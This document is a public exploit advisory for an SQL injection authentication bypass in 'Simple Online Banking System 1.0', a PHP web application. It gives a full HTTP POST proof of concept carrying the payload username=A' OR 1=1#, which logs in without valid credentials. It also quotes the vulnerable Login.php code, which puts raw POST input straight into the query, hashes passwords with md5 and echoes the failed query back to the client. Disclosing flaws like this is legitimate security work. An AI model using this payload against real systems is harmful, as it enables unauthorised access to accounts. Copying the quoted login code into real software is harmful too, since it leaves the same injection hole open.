Simple Online Banking System 1.0 SQL Injection

`# Exploit Title: Simple Online Banking System - SQLi (Authentication Bypass)  
# Date: 6 Jul, 2024  
# CVE: N/A  
# Exploit Author: bRpsd  
# Vendor Homepage: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html  
# Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html  
# Category: Web Application  
# Version: 1.0  
# Tested on: MacOS | Xampp  
  
  
  
  
  
  
POC:  
  
POST http://localhost/banking/classes/Login.php?f=login  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br, zstd  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 36  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/banking/admin/login.php  
Cookie: PHPSESSID=1472a7e8f9b230194b2515a42943f687  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
username=A' OR 1=1#&password=123  
  
  
Vuln code:/classes/Login.php  
Vuln parameter:username  
public function login(){  
extract($_POST);  
  
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");  
if($qry->num_rows > 0){  
foreach($qry->fetch_array() as $k => $v){  
if(!is_numeric($k) && $k != 'password'){  
$this->settings->set_userdata($k,$v);  
}  
  
}  
$this->settings->set_userdata('login_type',1);  
return json_encode(array('status'=>'success'));  
}else{  
return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));  
}  
}  
`